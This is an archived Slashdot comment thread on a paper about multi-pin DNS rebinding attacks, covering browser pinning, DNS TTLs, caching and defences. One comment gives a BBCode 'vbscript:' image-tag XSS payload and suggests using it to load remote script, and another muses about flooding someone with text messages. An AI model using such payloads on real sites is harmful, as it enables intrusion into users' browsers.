Follow Slashdot stories on Twitter

 



Forgot your password?
typodupeerror
×
Security

DNS Rebinding Attacks, Multi-Pin Variant 84

Morty writes "DNS rebinding attacks can be used by hostile websites to get browsers to attack behind firewalls, or to attack third parties. Browsers use "pinning" to prevent this, but a paper describes so-called multi-pin vulnerabilities that bypass the existing protections. Note that, from a DNS perspective, this is a "feature" rather than an implementation bug, although it's possible that DNS servers could be modified to prevent external sources from being able to point at internal resources."
This discussion has been archived. No new comments can be posted.

DNS Rebinding Attacks, Multi-Pin Variant

Comments Filter:
  • Fox? (Score:1, Flamebait)

    by StarvingSE ( 875139 )
    Is this a new FOX special?
  • by bugnuts ( 94678 ) on Monday August 06, 2007 @06:28PM (#20136201) Journal

    We are now checking your browser for DNS rebinding vulnerabilities.
    Not without Javascript you aren't!

    But it's true, most people loooove that javascript. I can't stand it, myself, and only enable it when I absolutely have to.
    • Does anyone know of a way to pause/restart someone else's running Javascript (in Firefox or Safari?) without reloading the page. I mostly browse with JS off, but occasionally turn it on for one site or another. But I'd like to be able to stop/pause JS after it starts (e.g., to pause an CPU-sucking JS animation loop or halt JS on a site where I unintentionally had JS on).

      Any ideas? Thanks.
      • Re: (Score:1, Informative)

        by Anonymous Coward
        • And how do you pause a running script without knowing where to set a breakpoint - or for that matter how do you pause a timer (setInterval) at all?
      • by captnitro ( 160231 ) * on Monday August 06, 2007 @07:17PM (#20136631)

        CPU-sucking JS animation loop.. Any ideas?


        You should probably consider upgrading from a 486.
        • Re: (Score:3, Insightful)

          by Sigma 7 ( 266129 )

          You should probably consider upgrading from a 486.

          Won't protect against the buggy Javascript in question.

          As an example, let's assume that one of those shaky "Your the 999,999th visitor" ads pins the CPU at 100%. Unless you only one web browser window/tab open (if you read /., probably not), it will be running more than once and thus cause problems. Even one 100% CPU process or thread can lock down the system - especially if it's called "Spoolsv.exe".

          Dual core systems could help... but it won't be long before an SMP process can do the 100% pinning as wel

          • by Kwiik ( 655591 )
            we repeat:
            You should probably consider upgrading from a 486.
            • by Sigma 7 ( 266129 )

              we repeat:
              You should probably consider upgrading from a 486.
              The processors capable of handling an infinite number of operations in finite time haven't been invented yet. But once that happens, we'll be able to have infinite-precision calculators.
              • by Kwiik ( 655591 )
                The point is that a faster processor, regardless of if it's multi-core, gives the OS a much better opportunity to arrange for multitasking with other processes of the same priority.

                I really hope nobody is scheduling javascript applications above the default priority.

                OTOH, can't a plausible fix for this be to have web browsers run all scripted functions within a lower priority thread?
      • Re: (Score:3, Interesting)

        by cheater512 ( 783349 )
        Firefox should kill any bad javascript automatically.
        If it hogs cpu then it will wait for a period of time then ask you what to do with it.
    • Re: (Score:1, Informative)

      by Anonymous Coward
      Not without Javascript you aren't!

      The article mentions Java and Flash are problems as well.
    • by grcumb ( 781340 ) on Monday August 06, 2007 @07:10PM (#20136573) Homepage Journal

      We are now checking your browser for DNS rebinding vulnerabilities.
      Not without Javascript you aren't!

      Heh, my boy, you just summed up the Web's great affliction in a nutshell.

      This particular exploit vector is especially troublesome because turning off the ability to point a name at multiple IPs would break a large part of the Internet. But it wouldn't be an issue for web browsers if we didn't see the need for the Web to be dynamic and interactive. Dynamism and interactivity are really not built into HTTP. It would be more accurate to say that HTTP was designed to be just the opposite.

      Website designers and software makers have been trying to turn the Web into a collection of desktop applications since about the time the Web was invented. This runs counter to what Tim Berners Lee intended. HTTP is stateless for a reason. I honestly don't think he made HTTP stateless because he envisioned the havoc that malicious websites could cause, but the principle of agnosticism (i.e. providing content without knowing anything about the requester's capabilities) that's implicit in the protocol is inherently more secure than the desire of many to make websites into remotely-accessed desktop apps.

      Unfortunately, this particular horse bolted from the barn in the earliest days of the web, and there's no easy way to get it back in. A wise web developer will nonetheless read and understand the HTTP protocol. Its statelessness and agnosticism can be strengths when considered in the proper light....

      ...Yeesh, that last sentence makes me feel like Yoda counselling young Luke.... 8^/

      • Re: (Score:3, Interesting)

        by grcumb ( 781340 )

        Heh, I picked a fine day to start pontificating about what the web is for [google.com]....

        Happy birthday, Web. You're almost street legal now.... 8^)

      • by fm6 ( 162816 )

        I honestly don't think he made HTTP stateless because he envisioned the havoc that malicious websites could cause, but the principle of agnosticism (i.e. providing content without knowing anything about the requester's capabilities) that's implicit in the protocol is inherently more secure than the desire of many to make websites into remotely-accessed desktop apps.

        You make some good points. But I don't think it's pr4oductive to imagine what Sir Tim had in mind when he invented http. Like many Internet pr

        • the original 3 HTTP methods were GET, PUT, and DELETE. POST/cgi came later. PUT and DELETE are used today in WEBDAV but not as originally intended (think wiki).
        • by grcumb ( 781340 )

          You make some good points. But I don't think it's pr4oductive [sic] to imagine what Sir Tim had in mind when he invented http.

          Not necessarily productive in any immediate sense, but educative. It does help us understand the current shortcomings of HTTP and to understand as well why it's been hacked into the shape that it's taken these days. I really worry about the naive approaches some so-called Web 2.0 applications take, and wanted to reiterate that those who don't learn from history are condemned to repeat it.

          If you want to get religious about "what the web was meant for" then you have to reject not just dynamic content, but any web application that goes beyond Sir Tim's original concept of simple shared documents. But of course, people went beyond that from day one.

          Agreed. That's more or less what I was implying, though not nearly as clearly and succinctly. 8^)

          Learning what HTT

        • by Jeruvy ( 1045694 ) *

          I'm not buying any of this. Sure some SMTP servers were open, but not the smart ones. Granted the smart ones were pretty rare. As for dynamic content, this was taken into account, but not 'on-the-fly' dynamic content or 'user-generated' dynamic content were not considered. A Browser would allow one to browse, not alter or change. But it was simple enough to take the content and alter it, and repost it, even linking to the original one. However IP and ownership of the 'content' got in the way. We quic

          • by fm6 ( 162816 )

            Sure some SMTP servers were open, but not the smart ones.
            Dude, when I started using the internet in 1994, I was able to telnet into any SMTP server. Richard Stevens even used this fact in his book on TCP/IP, to demonstrate how SMTP worked.
            • by Jeruvy ( 1045694 ) *
              Dude, The morris worm worked by exploiting SMTP, whats your point. The "smart" ones 'fixed' the problem'. It took the rest of the planet 10 years. Typical
              • by fm6 ( 162816 )
                My point being that there was a time when people didn't feel a need to secure their SMTP servers.
                • by Jeruvy ( 1045694 ) *
                  Your point is lost now. Even today, is a time when people don't feel the need to secure their (insert term) servers, we call them zombies.
                  • by fm6 ( 162816 )
                    Jeez, you're dense. I said that some Internet conventions date back to a period when people didn't worry about security; as an example I mentioned that people didn't even secure their smtp servers. You said "smart people always secured their servers." Which isn't true.

                    If you can't follow that argument, I'm certainly not going to try to parse it for you.
      • by DrSkwid ( 118965 )
        > This runs counter to what Tim Berners Lee intended

        He never thought of the Host: header either, perhaps we should go back to 1 IP per domain.
      • by sootman ( 158191 )
        I can't resist: "Read the Source, Luke!"

        Mods: don't waste points on this. :-)
      • This doesn't require round robin DNS to work. The main proof of concept linked to by that page, actually, just creates a new A entry for unixtimestamp() . some_3_digit_value . domain.tld.

        This entry points to the attacking webserver, and is given a very low TTL. Once DNS pinning is circumvented, the entry is changed. It doesn't have to have more than one A record.
    • by wytcld ( 179112 )
      Um ... at the author's site:

      We have detected that your browser is vulnerable to efficient DNS rebinding attacks.
      Since I'm running Noscript, either the author of the paper is a liar (or his "test" is phoney), or else you're wrong when you say

      Not without Javascript you aren't!
      Guess I'll have to read the PDF.
  • Flashback (Score:5, Insightful)

    by Spazmania ( 174582 ) on Monday August 06, 2007 @07:33PM (#20136747) Homepage
    If you haven't read the article, I'll summarize it for you: its another critical vulnerability in java/javascript. The sandboxed script in the web browser alternately makes GET and POST requests the "same" server with each POST containing the contents of the prior GET... Only the IP address associated with the server's hostname keeps alternating between a server inside your firewall and the attacker's real server outside it. Oops.

    At times like these, I tell a story about 1988 when I wrote a BBS terminal emulator for the Commodore 64 which cleverly allowed the BBS to send and run new code on the caller's machine. Another gentleman who didn't much like me noticed the feature and arranged for a number of BBS systems to execute the code at location 64738: system reset.

    There is no safe way to run complex sandboxed code on a user's PC and no safe way to allow sandboxed code access to the network. Either you trust the source of the program and let it do what it needs to do, or you don't trust it and don't allow it to run on your PC at all. How many of these vulnerabilities are we going to run through before we finally figure that out?
    • by Lux ( 49200 )
      > There is no safe way to run complex sandboxed code on a user's PC and no safe way to allow sandboxed code access to the network. Either you trust the source of the program and let it do what it needs to do, or you don't trust it and don't allow it to run on your PC at all. How many of these vulnerabilities are we going to run through before we finally figure that out?

      I'm not as much a pessimist as you are on this. The fact that so much of attackers' energy goes into circumventing the same origin polic
    • Re: (Score:3, Informative)

      by statusbar ( 314703 )

      One point placed in the paper:

      Current versions of the JVM are not vulnerable to this attack because the Java security policy has been changed. Applets are now restricted to connecting to the IP address from which they were loaded.

      if the web browser and applet are connecting to the server via a proxy, then neither the web browser nor the applet have control over "connecting to the same IP address from which they were loaded"

      Therefore, if a proxy is involved then current versions of the JVM are still

  • Is this a real threat? If so, how severe is it and how much effort must be expended to fix it?
  • What is "pinning" you may ask? From the linked pdf article, it's the caching of DNS lookups:

    A common defense [for DNS rebinding attacks] implemented in several browsers is DNS pinning: once the browser resolves a host name to an IP address, the browser caches the result for a fixed duration, regardless of TTL.

    But apparently this can be subverted with browser plug-ins, which have a separate "pin database".

    • it's the caching of DNS lookups

      Specifically, its caching of DNS lookups IN VIOLATION OF the DNS protocol standard for TTL. This causes all manner of havoc when you change ISPs and need the old name/address mappings to quickly expire. I've seen Windows boxen continue to poll the old IP address for a web site weeks after the lookup with a 5-minute TTL was changed to the new IP address.

      Pinning is bad bad bad and any application so poorly designed that it needs pinning to work securely is worse. If Javascript c
  • by mcrbids ( 148650 ) on Monday August 06, 2007 @08:00PM (#20136945) Journal
    Did you read the abstract?

    It's well written, and has lots of examples of exactly how this vulnerability can be exploited. In short, I could probably sit down and in a single afternoon, write a set of scripts for a webserver and DNS server, post it on a $30/month "virtual host" server, and take out an ad for $100, and end up with a powerful DDOS attack on my host of choice.

    All done in less than 24 hours.

    Screw the "cyber-terrorists" in Russia, this is REALLY BIG, and is one of many REALLY BIG problems that can be exploited! And the fact that we're here, reading and posting here, is demonstration of the fact that the many vulnerabilities of the Internet are NOT being exploited to anything like their real potential...

    So think about it: while we here at Slashdork might know as many as a dozen exploitable vulnerabilities like this one that would be nearly impossible to close, how many of us have actually DONE any of these?

    And that, folks, is why security will NEVER be 100% technical, and there will always be a social mechanism involved - there really is an amazing amount of security in simply knowing that if you do, really bad stuff could really happen to you.

    Not will happen, not even likely to happen. Just could happen is enough.

    Besides, there's a funny paradox at work here: those who have the skills to pull off an attack like this also have the skills to earn an income that's legitimate, without all the risks. I'm tempted from time to time to make use of my skills in a bad way when I think about how easy it is for me to wreak havoc - but the risks of doing so have always stopped me far short. I enjoy my day job, since its nature is fundamentally altruistic. So I'm harmless.

    As a case in point, I was chatting with my flight instructor and a staff member at the local FBO (an airport for small planes) and the staff member mentioned something about an annoying ex-boyfriend who kept calling her.

    Without thinking, I mentioned the possibility of writing a quick script to send him 100,000 text messages that would say "Leave me the freak alone!". I imagined a two-line script that would take all of about 10 seconds to write, and I could use the hotspot at the FBO to do it.

    100,000 isn't even a particularly big number for me - I routinely deal with datasets in the millions of records - so it didn't really occur to me right away what a blow that would be. But 100,000 times 5 cents adds up to $5,000 worth of text messages! And I'm sure that his cell company would limit the number of messages to be sent, but it's pretty certain that quite a few WOULD get through.

    It was surprising to me what a staggering blow this would be. I was actually a bit embarrassed at having mentioned it.

    Don't underestimate the power of social mechanisms to ensure our security!
    • by flonker ( 526111 )
      The really scary thing is, repinning to the local IP address, and then using the socket based vulnerabilities to port 135, allowing the attacker to bypass software (and hardware) firewalls, and fully compromise the victim. All for the cost of a single ad impression!
    • Besides, there's a funny paradox at work here: those who have the skills to pull off an attack like this also have the skills to earn an income that's legitimate, without all the risks. I'm tempted from time to time to make use of my skills in a bad way when I think about how easy it is for me to wreak havoc - but the risks of doing so have always stopped me far short. I enjoy my day job, since its nature is fundamentally altruistic. So I'm harmless.

      I don't have a day job, but still can't be bothered wrea

    • Yeah, when I was in college 10 years ago I discovered several ways of effectively shutting down the internet. The possibility of punishment wasn't there (our lab computers didn't require people to log in to use so there's no audit trail), but I still didn't do it since I am of the opinion that practical jokes should always be in good humor.
    • Perhaps I'm missing something critical here, but wouldn't the complexity of this attack make it largely un-useful. In order to switch the user's DNS back and forth between external and internal, you would need control of that user's DNS server, or at least a DNS server further up the chain. Beyond that, some knowledge of the internal network is required so the attacker knows where to go. Does the javascript exploit change the user's DNS server to something malicious?

      In the event that everything lines up,
      • by Morty ( 32057 )

        Perhaps I'm missing something critical here, but wouldn't the complexity of this attack make it largely un-useful. In order to switch the user's DNS back and forth between external and internal, you would need control of that user's DNS server, or at least a DNS server further up the chain.

        RTFA. The attacker doesn't manipulate the user's DNS, the attacker manipulates his/her own DNS. The attacker uses records with low or 0 TTLs, so the user's DNS doesn't cache them as per spec. The trick is that the att

  • by linuxkrn ( 635044 ) <(moc.nigolxunil) (ta) (nostawg)> on Monday August 06, 2007 @08:09PM (#20137007)
    I did RTFA, and it seems to me they made an oversight in the fact that most ISP/corp sites use a caching DNS server. A repeated lookup to the same domain will return the cached result. Their POC depends on the client doing another lookup and getting a different result. This would attack would depend on the client being able to the attacker's DNS.

    Now they do say that the attacker DNS returns more then one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh to not get cached. And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP Qwest, has a bad habit of ignoring the TTL in my zone files.

    example 1:

    target lookup (T0) -> www.attacker.com
    www.attacker.com -> 192.168.0.1

    target lookup (T1) -> www.attacker.com
    ISP/site cached reply -> 192.168.0.1 (attack failed)

    Example 2:
    target lookup (T0) -> www.attacker.com
    www.attacker.com -> 192.168.0.1

    target lookup (T1) -> www2.attacker.com
    attacker's ISP cached reply -> 192.168.0.1 (attack failed again)

    The only case I can see this working if the zone records contain an IP for some third party source that they want to try and abuse. So say www2.attacker.com points to 10.0.0.1 and that number is static in their zone record. Which appears to be much less efficient zombie scan with IP spoofing.

    And finally, this is all dependent on the attacker tricking the client into loading Flash/Java/Javascript from their box. Another win for noscript.
    • by evought ( 709897 )

      [snip]
      Now they do say that the attacker DNS returns more then one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh to not get cached. And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP Qwest, has a bad habit of ignoring the TTL in my zone files.
      [snip]

      Worse than that, they are assuming that the OS itself is not caching the result. I sometimes have to manually flush my cache (OS X) when playing with DNS records. OS X can't be the only system that caches lookups.

      • by Morty ( 32057 )
        Worse than that, they are assuming that the OS itself is not caching the result. I sometimes have to manually flush my cache (OS X) when playing with DNS records. OS X can't be the only system that caches lookups.
        The article explicitly says that the attack assumes low or 0 TTLs. Your OS cache should not be caching 0 TTLs per RFC1034. Normally, you need to flush the cache because you are editing a record with a high(er) TTL, so your local cache legitimately retains the old version of the record. Some cac
        • Re: (Score:3, Informative)

          by afidel ( 530433 )
          Your OS cache should not be caching 0 TTLs per RFC1034

          Meanwhile back in the real world both OSX and Windows DO ignore 0 TTL's as do many ISP's caching DNS servers. This is one of the things that makes round-robin DNS and ISP cutovers rather hard to plan in the real world. In fact I assume that some worst case ISP's will cache results for 48-72 hours despite a TTL of say 10 minutes.
    • by Morty ( 32057 )
      Now they do say that the attacker DNS returns more then one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh to not get cached.

      DNS servers cache based on the resource record's TTL, not based on the zone's SOA's serial. The serial is used by secondaries.

      And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP Qw
    • Re: (Score:2, Informative)

      by BitZtream ( 692029 )
      The zone serial number has nothing to do with this. DNS cache entries, be it on the host, or in caching DNS servers, or the clients primary DNS server are controlled by the TTL setting (Time to live). If you set the TTL to 0, you effectively disable caching across the internet for your domain. You may find some caching servers that won't honor a 0, but they're sure to expire the cache entry pretty quickly and they are few and far between.
      • Re: (Score:2, Informative)

        by ACMENEWSLLC ( 940904 )
        It seems that it is a given that the host name must stay the same for this to work and that TTL must be very low, per TFA.

        So if I modify my DNS cache server to ignor low TTL's and force a minimum TTL of 60 minutes, then I've defeated this issue. Of course, I've also broke external site's ability to do quick fail overs. But that can wait until a browser fix is out.

        A browser fix could defeat this by maintaining DNS entries for a period of time. If the DNS changes to RFC1918 from non RFC1918, then prompt th
    • by DrSkwid ( 118965 )
      1) run your own nameserver
      2) use a new subdomain for every request
      3) ???
      4) profit
    • by flonker ( 526111 )
      A host can have multiple A records, therefore you don't need to take advantage 0 TTL, you can just use the multiple A records to have the browser choose a random IP. You'll get a 50% success rate, but that's still pretty good.
  • Where can I find lists of DNS servers I can use instead of my cablemodem's default from my ISP? Servers that will let me point at them, that are fast and reliable.
    • Here's one that will* work for everyone: 127.0.0.1

      *After you set up your own DNS server on the same computer.
    • Re: (Score:3, Informative)

      by theGreater ( 596196 )
      OpenDNS ( http://www.opendns.com/ [opendns.com] ) works pretty well. I typically go internal cache, external ISP, openDNS on my systems. Keeps Windows boxes in line, especially.

      -theGreater.
    • by Electrum ( 94638 )
      Where can I find lists of DNS servers I can use instead of my cablemodem's default from my ISP?

      OpenDNS [opendns.com]
      • OpenDNS uses wildcarding that was despised when Network Solutions tried it. Granted, if all web servers had proper pointers it wouldn't be an issue since www.slashdot.org would be the same as slashdot.org. OpenDNS also breaks the "I Feel Lucky" lookup feature built into Firefox by removing Google from the loop. I tried it, I didn't like it. OpenDNS doesn't play well with my browsing habits. If I type domain.com instead of www.domain.com Firefox will attempt to lookup www.domain.com if domain.com doesn't hav
    • 4.2.2.1-4.2.2.6. Anycasted for speedy access.
  • There are plenty of other exploits that allow far greater control over all the IE users on the Internet than this. It still relies on the user going to a malicious website in the first place. If you can draw users to that web site, you might as well just fully exploit their browser and get some real code on the machine, then use it rather than bouncing crap around with javascript and constantly changing DNS entries.

    And considering that I've already (after reading the article mind you) changed my DNS serve
    • Re: (Score:3, Informative)

      by Morty ( 32057 )

      It still relies on the user going to a malicious website in the first place.

      If you read the original article, you will note that they generated exploit stats by utilizing an ad network. You don't need to visit a "bad" website, you just need a "bad" ad while visiting a normal website.

      And considering that I've already (after reading the article mind you) changed my DNS servers to not return results matching our internal address range for lookups resolved from external hosts, its ever less useful.

      Cool! What

      • If you read the original article, you will note that they generated exploit stats by utilizing an ad network. You don't need to visit a "bad" website, you just need a "bad" ad while visiting a normal website.
        That's a yet another reason to block known advertisers, with AdBlock personally or company-wide with stuff like dnscruft.
      • Any DNS server that *can't* be configured to ignore requests for internal names from external addresses is pretty broken.
        • by Morty ( 32057 )

          Any DNS server that *can't* be configured to ignore requests for internal names from external addresses is pretty broken.

          That's not the problem. The problem is requests from internal addresses for external names that resolve to internal addresses. How do you block *that*?
    • by DrSkwid ( 118965 )
      Not if you use an XSS vulnerability. I already know 1 popular site I could use.
      HINT: XSS filters sometimes don't check for just the javascript: version.

      I think https would sort most of this problem out. Cheap certs really are a must !
      • by DrSkwid ( 118965 )
        bah slashcode ate my comment, I'll do it in BBCode seeing as that's usually the place to exploit it

        [img]vbscript:msgbox("xss js 0wns j00")[/img]

        use the vbscript of your choice, I'd pop an XMLHttpRequest out, eval the returned javascript and off you go
  • ... so that we can redirect links to the paper explaining all to a server that isn't slashdotted...
  • Multi-Pass!

    (Sorry, it was the first thing that came to mind.)

Keep up the good work! But please don't ask me to help.

Working...